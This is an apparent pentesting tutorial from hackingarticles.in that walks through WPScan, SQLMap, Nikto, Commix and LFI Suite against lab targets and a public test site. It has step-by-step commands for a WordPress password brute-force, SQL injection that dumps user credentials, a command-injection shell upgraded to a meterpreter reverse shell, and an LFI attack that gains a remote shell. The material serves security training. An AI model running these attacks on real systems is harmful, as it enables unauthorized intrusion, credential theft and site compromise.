TABLE OF CONTENTS

1 WPscan 4
2 Enumerating WordPress Plugins 6
2.1 Enumerate themes, plugins and username with a single 7
command
2.2 Brute-force attack using WPScan 8
3 SQLMap 11
3.1 Database Penetration Testing using Sqlmap 11
3.2 Databases 12
3.3 Tables 13
3.4 Columns 14
3.5 Get data from a table 15
3.6 Dump All 16
4 Nikto 18
4.1 Options present in Nikto 18
5 Commix 24
6 LFI Suite 29
7 About Us 34

www.hackingarticles.in Page | 2
WPscan
“WordPress is one of the most powerful CMS platform, which covers about 35% of the total share of
the websites over the internet”. Thus in order to enumerate such web-applications, we’ll be
using “WPScan” –which is a black box vulnerability scanner for WordPress, scripted in Ruby to focus
on different vulnerabilities that are present in the WordPress applications, either in its themes or
plugins.
Well, WPScan comes preinstalled in Kali Linux, SamuraiWTF, Pentoo, BlackArch; which scans up its
database in order to find out the outdated versions and the vulnerabilities in the target’s web
application.
Let’s check out the major things that WPScan can do for us:
• Detect the version of currently installed WordPress.
• Can detect sensitive files like readme, robots.txt, database replacing files, etc.
• Detect enabled features on currently installed WordPress server such as file_upload.
• Enumerates the themes, plugins along with their versions and tells if they are outdated or not.
• It even scans up the web-application to list out the available usernames.

As discussed earlier, WPScan is installed by default in the Kali Linux machines, so let’s check out the
default usage options, by simply firing the following command in the terminal.

wpscan -hh

www.hackingarticles.in Page | 4
Scanning the WordPress version of the target’s website
As we were presented with the default options, let’s now try to do a basic scan over the vulnerable
WordPress web-application that we’ve set up in our earlier article.

Type the following command to scan the WordPress application and its server.

wpscan --url http://192.168.1.105/wordpress/

From the below image you can see that it dumps up everything it could – the WordPress version,
theApache server, and even it also found that the upload directory has directory listing
enables which means anyone can browse to “/wp-content/uploads” in order to check out the
uploaded files and contents.

www.hackingarticles.in Page | 5
Enumerating WordPress Plugins
Plugins are the small piece of codes, that when added to a WordPress web-application, boost up the
functionalities, and enhance the website’s features.
But these plugins may sometimes cause great damage to the web-application due to their loosely
written codes.
Lets’s check out the installed plugins on our target’s web-application by executing the below
command:

wpscan --url http://192.168.1.105/wordpress/ -e ap

Similar to the themes, we can also check the vulnerable plugins by using the “-vp” flag.

After waiting for a few seconds, WPScan will dump our desired result. From the below image, you can
see the plugins “mail-masta” and “reflex-gallery” are installed over our target’s website. As a bonus,
we even get the last update and the latest version.

www.hackingarticles.in Page | 6
Enumerate themes, plugins and username with a
single command
Does WPScan give us that privilege to scan up the web-applications to check everything in one go,
whether it is its version, the installed themes, or the plugins?
Let’s check this out!
Fire up the following command to grab everything we scanned above for our target web-application.

wpscan --url http://192.168.1.105/wordpress/ -e at –e ap –e u

–e: at: enumerate all themes of targeted website

–e: ap: enumerate all plugins of targeted website

–e: u: enumerate all usernames of targeted website

www.hackingarticles.in Page | 7
Brute-force attack using WPScan
With the help of usernames which we enumerated earlier, we can create a word list of all the users
and can try a brute-force login attack using the default password list as “rockyou.txt”. You can learn
more about cracking the WordPress logins from here.
From the below image you can see our designed wordlist.

Let’s now try to exploit the website by defacing its login credentials using the following command:

wpscan --url http://192.168.1.105/wordpress/ -U user.txt -P

/usr/share/wordlists/rockyou.txt

The –U and the –P flags are used to set up the username list and the password list respectively.

It will start matching the valid combination of username and password and then dumps the result,
from the given image you can see we found the login credentials.

www.hackingarticles.in Page | 8
Great!! We got the admin credentials as “admin : jessica”. Let’s try to get into the application’s
dashboard with them.

www.hackingarticles.in Page | 9
SQLMap
SQLMap is an open source penetration testing tool that automates the process of detecting and
exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection
engine, many niche features for the ultimate penetration tester and a broad range of switches lasting
from database fingerprinting, over data fetching from the database, to accessing the underlying file
system and executing commands on the operating system via out-of-band connections.

Database Penetration Testing using Sqlmap

Sometimes you visit such websites that let you select product item through their picture gallery if you
observer its URL you will notice that product item is called through its product-ID numbers.
Let’s take an example

http://testphp.vulnweb.com/artists.php?artist=1

So when attacker visits such kind of website he always checks for SQL vulnerability inside web server
for lunching SQL attack.

Let’s check how attacker verifies SQL vulnerability.

The attacker will try to break the query in order to order to get the error message, if he successfully
received an error message then it confirms that web server is SQL injection affected.

http://testphp.vulnweb.com/artists.php?artist=1'

From the screenshot you can see we have received error message successfully now we have made
SQL attack on a web server so that we can fetch database information.

www.hackingarticles.in Page | 11
Databases
For database penetration testing we always choose SQLMAP, this tool is very helpful for beginners
who are unable to retrieve database information manually or unaware of SQL injection techniques.
Open the terminal in your Kali Linux and type following command which start SQL injection attack on
the targeted website.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch

-u: target URL

–dbs: fetch database name
–batch: This will leave sqlmap to go with default behavior whenever user’s input would be required

Here from the given screenshot, you can see we have successfully retrieve database name “acuart”

www.hackingarticles.in Page | 12
Tables
As we know a database is a set of record which consist of multiple tables inside it therefore now use
another command in order to fetch entire table names from inside the database system.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart

--table --batch

-D: DBMS database to enumerate (fetched database name)

–tables: enumerate DBMS database table

As a result, given in screenshot, we have enumerated entire table name of the database system. There
are 8 tables inside the database “acuart” as following:
T1: artists
T2: carts
T3: categ
T4: featured
T5: guestbook
T6: pictures
T7: products
T8: users

www.hackingarticles.in Page | 13
Columns
Now further we will try to enumerate the column name of the desired table. Since we know there is a
users table inside the database acuart and we want to know all column names of users table,
therefore, we will generate another command for column captions enumeration.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart

-T users --columns --batch

-T: DBMS table to enumerate (fetched table name)

–columns: enumerate DBMS database columns

www.hackingarticles.in Page | 14
Get data from a table
Slowly and gradually, we have penetrated many details of the database but last and most important
step is to retrieve information from inside the columns of a table. Hence, at last, we will generate a
command which will dump information of user’s table.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart

-T users --dump --batch

–dump: dump all information of DBMS database

Here from the given screenshot, you can see it has to dump entire information of table users, mainly
users table contains login credential of other users. You can use these credentials for login into the
server on behalf of other users.

www.hackingarticles.in Page | 15
Dump All
The last command is the most powerful command in sqlmap which will save your time in database
penetration testing; this command will perform all the above functions at once and dump entire
database information including table names, column and etc.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart

--dump-all --batch

This will give you all information at once which contains database name as well as table’s records.
Try it yourself!!!

www.hackingarticles.in Page | 16
Nikto
Examine a web server to find potential problems and security vulnerabilities, including:

• Server and software misconfigurations

• Default files and programs
• Insecure files and programs
• Outdated servers and programs
Nikto is built on LibWhisker (by RFP) and can run on any platform which has a Perl environment. It
supports SSL, proxies, host authentication, IDS evasion and more.

Options present in Nikto

To check what all options are present we will use “nikto –help”

Below are all of the Nikto command line options and explanations. A brief version of this text is
available by running Nikto with the -h (-help) option.

• -ask: Whether to ask about submitting updates: yes (ask about each-- the default), no (don't
ask, just send), auto (don't ask, just send).

• -Cgidirs: Scan these CGI directories. Special words "none" or "all" may be used to scan all CGI
directories or none, (respectively). A literal value for a CGI directory such as "/cgi-test/" may
be specified (must include trailing slash). If this is option is not specified, all CGI directories
listed in nikto.conf will be tested.

• -config: Specify an alternative config file to use instead of the nikto.conf file located in the
install directory.

www.hackingarticles.in Page | 18
• -dbcheck: Check the scan databases for syntax errors.

• -Display: Control the output that Nikto shows. See Chapter 5 for detailed information on these
options. Use the reference number or letter to specify the type. Multiple may be used:
1 - Show redirects
2 - Show cookies received
3 - Show all 200/OK responses
4 - Show URLs which require authentication
D - Debug Output
E - Display all HTTP errors
P - Print progress to STDOUT
V - Verbose Output

• -evasion: Specify the LibWhisker encoding/evasion technique to use (see the LibWhisker docs
for detailed information on these). Note that these are not likely to actually bypass a modern
IDS system, but may be useful for other purposes. Use the reference number to specify the
type, multiple may be used:
1 - Random URI encoding (non-UTF8)
2 - Directory self-reference (/./)
3 - Premature URL ending
4 - Prepend long random string
5 - Fake parameter
6 - TAB as request spacer
7 - Change the case of the URL
8 - Use Windows directory separator (\)
A - Use a carriage return (0x0d) as a request spacer
B - Use binary value 0x0b as a request spacer

• -findonly: Only discover the HTTP(S) ports, do not perform a security scan. This will attempt
to connect with HTTP or HTTPS, and report the Server header. Note that as of version 2.1.4, -
findonly has been deprecated and simply sets '-Plugins "@@NONE"' which will override any
command line or config file settings for -Plugins.

• -Format: Save the output file specified with -o (-output) option in this format. If not specified,
the default will be taken from the file extension specified in the -output option. Valid formats
are:
csv - a comma-seperated list
htm - an HTML report
msf - log to Metasploit
txt - a text report
xml - an XML report

• -host: Host(s) to target. Can be an IP address, hostname or text file of hosts. A single dash (-)
may be used for stdin. Can also parse nmap -oG style output

• -Help: Display extended help information.

• -id: ID and password to use for host Basic host authentication. Format is "id:password".

• -IgnoreCode: Ignore these HTTP codes as negative responses (always). Format is "302,301".

www.hackingarticles.in Page | 19
• -list-plugins: Will list all plugins that Nikto can run against targets and then will exit without
performing a scan. These can be tuned for a session using the -Plugins option.

• -mutate: Specify mutation technique. A mutation will cause Nikto to combine tests or attempt
to guess values. These techniques may cause a tremendous amount of tests to be launched
against the target. Use the reference number to specify the type, multiple may be used:
1 - Test all files with all root directories
2 - Guess for password file names
3 - Enumerate user names via Apache (/~user type requests)
4 - Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
5 - Attempt to brute force sub-domain names, assume that the host name is the
parent domain
6 - Attempt to guess directory names from the supplied dictionary file

• -mutate-options: Provide extra information for mutates, e.g. a dictionary file

• -nolookup: Do not perform name lookups on IP addresses.

• -nocache: Disable response cache

• -nointeractive: Disable interactive features

• -nossl: Do not use SSL to connect to the server.

• -no404: Disable 404 (file not found) checking. This will reduce the total number of requests
made to the webserver and may be preferable when checking a server over a slow link, or an
embedded device. This will generally lead to more false positives being discovered.

• -output: Write output to the file specified. The format used will be taken from the file
extension. This can be over-riden by using the -Format option (e.g., to write text files with a
different extenstion. Existing files will have new information appended.

• -Plugins: Select which plugins will be run on the specified targets. A semi-colon separated list
should be provided which lists the names of the plugins. The names can be found by using -
list-plugins.
There are two special entries: @@ALL, which specifies all plugins shall be run and @@NONE,
which specifies no plugins shall be run. The default is @@DEFAULT

• -port: TCP port(s) to target. To test more than one port on the same host, specify the list of
ports in the -p (-port) option. Ports can be specified as a range (i.e., 80-90), or as a comma-
delimited list, (i.e., 80,88,90). If not specified, port 80 is used.

• -Pause: Seconds (integer or floating point) to delay between each test.

• -root: Prepend the value specified to the beginning of every request. This is useful to test
applications or web servers which have all of their files under a certain directory.

• -ssl: Only test SSL on the ports specified. Using this option will dramatically speed up requests
to HTTPS ports, since otherwise the HTTP request will have to timeout first.

www.hackingarticles.in Page | 20
• -Save: Save request/response of findings to this directory. Files are plain text and will contain
the raw request/response as well as JSON strings for each. Use a "." to auto-generate a
directory name for each target. These saved items can be replayed by using the included
replay.pl script, which can route items through a proxy.

• -timeout: Seconds to wait before timing out a request. Default timeout is 10 seconds.

• -Tuning: Tuning options will control the test that Nikto will use against a target. By default, all
tests are performed. If any options are specified, only those tests will be performed. If the "x"
option is used, it will reverse the logic and exclude only those tests. Use the reference number
or letter to specify the type, multiple may be used:
0 - File Upload
1 - Interesting File / Seen in logs
2 - Misconfiguration / Default File
3 - Information Disclosure
4 - Injection (XSS/Script/HTML)
5 - Remote File Retrieval - Inside Web Root
6 - Denial of Service
7 - Remote File Retrieval - Server Wide
8 - Command Execution / Remote Shell
9 - SQL Injection
a - Authentication Bypass
b - Software Identification
c - Remote Source Inclusion
x - Reverse Tuning Options (i.e., include all except specified)
The given string will be parsed from left to right, any x characters will apply to all characters
to the right of the character.

• -Userdbs: Load user defined databases instead of standard databases. User defined databases
follow the same syntax as the standard files, but are prefixed with a 'u', e.g., 'udb_tests'
all - Disable all standard databases and load only user databases
tests - Disable db_tests and load udb_tests. All other databases are loaded normally.

• -until: Run until the specified time or duration, then pause.

• -update: Update the plugins and databases directly from cirt.net.

• -useproxy: Use the HTTP proxy defined in the configuration file. The proxy may also be directly
set as an argument.

• -Version: Display the Nikto software, plugin and database versions.

• -vhost: Specify the Host header to be sent to the target.

www.hackingarticles.in Page | 21
Let’s scan our bWAPP using nikto in order to find out potential problems and vulnerabilities present.

nikto -host http://192.168.218.131/bWAPP/

www.hackingarticles.in Page | 22
Commix
Sometimes fuzzing consumes a lot of time, and even it becomes somewhat frustrating while
performing a command injection attack over it i.e. wait for the incremented length and check for every
possible response it drops.
In order to make our attack simpler and faster, we’ll be using a python scripted automated
tool“Commix”, which makes it very easy to find the command injection vulnerability and then helps
us to exploit it. You can learn more about Commix from here.
So let’s try to drop down the web-application again by getting a commix session in our kali machine.
From the below image you can see that I’ve set the security level too high and opted the “Choose your
bug” option to “OS Command Injection”.

Commix works on cookies. Thus in order to get them, I’ll be capturing the browser’s request into my
burpsuite, by simply enabling the proxy and the intercept options, further as I hit up
the Lookup button, I’ll be presented with the details into the burpsuite’s Proxy tab.

www.hackingarticles.in Page | 24
 Fire up you Kali Terminal with commix and run the following command with the Referer, Cookie, and
target values:

commix --url="http://192.168.0.11/bWAPP/commandi.php" --
cookie="security_level=2; PHPSESSID=cc91040cc70b9abdb2fdc637527bf132" -
-data="target=www.nsa.gov&form=submit"

Type ‘y’ to resume the classic injection point and to the pseudo-terminal shell.

Great!! We’re into our target’s machine.

What if we could convert this commix shell into a meterpreter one?
As soon as we capture the commix session, we’ll try to generate a reverse meterpreter session of the
target machine by executing the following commands:

reverse_tcp

set lhost
192.168.0.9
set lport 4444

www.hackingarticles.in Page | 25
As we hit enter, it will ask us to choose whether we want a netcat shell or some
other (meterpreter) one. Choose option 2 and hit enter again.

Now you’ll be popped up with a new list of sessions asking for which meterpreter session you want as
in whether you want it to be PHP, Windows, python etc. As our target server is running over the PHP
framework, we will select option 8 i.e. a PHP meterpreter reverse shell.

When everything is done, it will provide us with a resource file with an execution command. Open a
new terminal window and type the presented command there, as in our case it generated the
following command:

msfconsole -r /usr/share/commix/php_meterpreter.rc

www.hackingarticles.in Page | 26
Cool!! It’s great to see that our commix session is now having some new wings.

www.hackingarticles.in Page | 27
LFI Suite
Sometimes it becomes a bit frustrating while performing the LFI attack using Burp suite, i.e. wait for
the incremented length and check for every possible response it shows. In order to make this task
somewhat simpler and faster, we’ll be using an amazing automated tool called LFI Suite. This helps us
to scan the web site’s URL and if found vulnerable, it displays all the possible results, therefore we can
use it to gain the website’s remote shell. You can download this from here.
Firstly, we’ll clone the LFI suite and boot it up in our kali machine using the following code:

git clone https://github.com/D35m0nd142/LFISuite.git

cd LFISuite

python lfisuite.py

Choose the 2nd option as “Scanner” in order to check the possible input parameters.
Now it ask us to “enter the cookies”, I’ve installed the “HTTP Header live” plugin to capture the HTTP
passing requests.

www.hackingarticles.in Page | 29
From the below image you can see that I’ve copied the captured cookies into the cookies field and
disable the Tor proxy. We just need to enter the website’s URL and hit enter.

Now the attack has been started and we can see that there are 40 different parameters through we
can exploit the LFI vulnerability into our web-application.

www.hackingarticles.in Page | 30
Now it’s time to connect to the victim and deface the website by capturing its remote shell.
Restart the application and this time choose option 1 as “Exploiter”. Enter the required fields with the
same cookies that we’ve used in the scanner section and set the Tor proxy to “No”.

As soon as you hit enter, you’ll find a list with multiple ways to attack the webserver.
Select the option 9 as “Auto Hack”.
A new section will pop-up asking for the web site’s URL, here enter the target website and hit enter.

http://192.168.0.11/bWAPP/rlfi.php?language=

www.hackingarticles.in Page | 31
Cool!! We’ve successfully captured the victim’s command shell.

Reference:
• https://www.hackingarticles.in/comprehensive-guide-to-local-file-inclusion/
• https://www.hackingarticles.in/comprehensive-guide-on-os-command-injection/
• https://www.hackingarticles.in/comprehensive-guide-to-sqlmap-target-options15249-2/
• https://www.hackingarticles.in/wpscanwordpress-pentesting-framework/
• https://cirt.net/nikto2-docs/

www.hackingarticles.in Page | 32
 JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security

Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer

Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in